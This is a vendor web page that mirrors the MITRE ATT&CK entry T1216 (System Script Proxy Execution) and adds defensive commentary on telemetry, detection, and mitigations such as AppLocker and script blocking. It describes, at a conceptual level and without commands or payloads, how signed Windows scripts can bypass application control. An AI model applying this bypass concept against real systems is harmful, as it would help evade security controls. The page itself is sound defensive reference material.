Live Active security incident? Get immediate response
MITRE ATT&CK® Technique

T1216: System Script Proxy Execution

Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.[1] This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.[2]

EnterpriseT1216TechniqueObject v3.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence High

System Script Proxy Execution matters because trusted, often Microsoft-signed Windows scripts can be used as an execution path for malicious files. For leaders, the business issue is not the script itself; it is whether application control and signature-based trust are being treated as sufficient when trusted scripts may still launch unauthorized activity.

Executive priority

Prioritize this as a Windows execution-control and monitoring validation item. Ask whether application control, script blocking, and SOC telemetry account for signed Microsoft utilities and scripts being used as proxies, not just unsigned or obviously malicious files. This is especially relevant for audit evidence around execution prevention and for incident response decisions where a signed script may otherwise be misclassified as benign.

Technical view

ATT&CK lists this as a Windows technique under the stealth tactic, with no official detection text provided. Defensive validation should therefore be driven by the related detection strategy DET0466, which focuses on script-based proxy execution via signed Microsoft utilities, and by the related sub-techniques PubPrn and SyncAppvPublishingServer. SOC and IR teams should review whether execution chains involving trusted Windows scripts, script hosts, command shell use, PowerShell invocation, and remote or unauthorized file execution are visible and triaged in context rather than trusted solely because Microsoft signing is present.

Likely telemetry

  • Windows process creation events, including parent-child process relationships for script hosts and command shells
  • Command-line arguments for signed scripts and associated interpreters
  • PowerShell execution telemetry where script proxying invokes PowerShell commands
  • Application control or execution prevention logs such as allow, block, and audit decisions
  • File execution metadata, including signer information and file path context

Detection direction

  • Validate DET0466-style coverage for signed Microsoft utilities and scripts being used to proxy execution, rather than only alerting on unsigned binaries.
  • Tune detections around unusual parent-child relationships, script arguments, and execution of remote or unauthorized files while accounting for legitimate administrative and Windows application virtualization activity.
  • Review the PubPrn and SyncAppvPublishingServer sub-techniques as concrete detection design inputs for Windows environments.
  • Do not rely on certificate signing alone as a benign signal; correlate signer trust with command line, file location, initiating user, and downstream process behavior.
  • Because ATT&CK provides no official detection text for the parent technique, confirm coverage with local telemetry tests and incident review rather than assuming vendor defaults detect it.

Mitigation priorities

  • Implement and maintain execution prevention controls as represented by M1038, including application control and script blocking where appropriate.
  • Use allowlisting policy design that considers trusted scripts capable of launching other files, not only the trust status of the initial script.
  • Run application control in an audit or validation workflow before enforcement where business-critical Windows or App-V related scripts may be present.
  • Document approved administrative use cases for Windows signed scripts so SOC teams can distinguish expected activity from suspicious proxy execution.
  • Feed observed gaps back into endpoint hardening, detection engineering, and compliance evidence for execution control effectiveness.
Analyst notes and limits

The supplied ATT&CK object is a parent technique with two related sub-techniques: PubPrn and SyncAppvPublishingServer. The strongest defensive value is in validating whether Windows execution controls and monitoring can distinguish legitimate signed-script use from signed-script proxy execution. External references are LOLBAS and the Ultimate AppLocker Bypass List, which support the living-off-the-land and application-control-bypass framing.

ATT&CK provides no official detection text for this object, and the supplied relationship context does not include detailed DET0466 analytics. This take does not assert active exploitation, attribution, prevalence, or guaranteed detection. Local Windows configuration, application control policy, script usage, and logging depth are required to determine actual risk and coverage.

Official MITRE ATT&CK definition

System Script Proxy Execution

Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.[1] This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.[2]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Related techniques

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

2 rows
Domain ID Name Relationship / procedure
Enterprise T1216.001 PubPrn Sub-technique PubPrn subtechnique of this object.
Enterprise T1216.002 SyncAppvPublishingServer Sub-technique SyncAppvPublishingServer subtechnique of this object.
Relationship explorer

All related ATT&CK context

mitigates · Mitigation M1038: Execution Prevention Enterprise detects · Detection Strategy DET0466: Detection of Script-Based Proxy Execution via Signed Microsoft Utilities Enterprise subtechnique of · Technique T1216.001: PubPrn Enterprise subtechnique of · Technique T1216.002: SyncAppvPublishingServer Enterprise
Mitigations

Mitigation direction

Mitigation Enterprise

M1038: Execution Prevention

Prevent the execution of unauthorized or malicious code on systems by implementing application control, script blocking, and other execution prevention mechanisms. This ensures that only trusted and authorized code is executed, reducing the risk of malware and unauthorized actions. This mitigation can be implemented through the following measures:

Application Control:

- Use Case: Use tools like AppLocker or Windows Defender Application Control (WDAC) to create whitelists of authorized applications and block unauthorized ones. On Linux, use tools like SELinux or AppArmor to define mandatory access control policies for application execution. - Implementation: Allow only digitally signed or pre-approved applications to execute on servers and endpoints. (e.g., `New-AppLockerPolicy -PolicyType Enforced -FilePath "C:\Policies\AppLocker.xml"`)

Script Blocking:

- Use Case: Use script control mechanisms to block unauthorized execution of scripts, such as PowerShell or JavaScript. Web Browsers: Use browser extensions or settings to block JavaScript execution from untrusted sources. - Implementation: Configure PowerShell to enforce Constrained Language Mode for non-administrator users. (e.g., `Set-ExecutionPolicy AllSigned`)

Executable Blocking:

- Use Case: Prevent execution of binaries from suspicious locations, such as `%TEMP%` or `%APPDATA%` directories. - Implementation: Block execution of `.exe`, `.bat`, or `.ps1` files from user-writable directories.

Dynamic Analysis Prevention: - Use Case: Use behavior-based execution prevention tools to identify and block malicious activity in real time. - Implemenation: Employ EDR solutions that analyze runtime behavior and block suspicious code execution.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
3.0
Created
Modified
Raw hash
e1aeeb7ad50ed15b...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 3.0 Current bundle e1aeeb7ad50e…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    LOLBAS Project

    Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.

    Open source URL
  2. [2]
    GitHub Ultimate AppLocker Bypass List

    Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.

    Open source URL
  3. [3]
    mitre-attack T1216
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use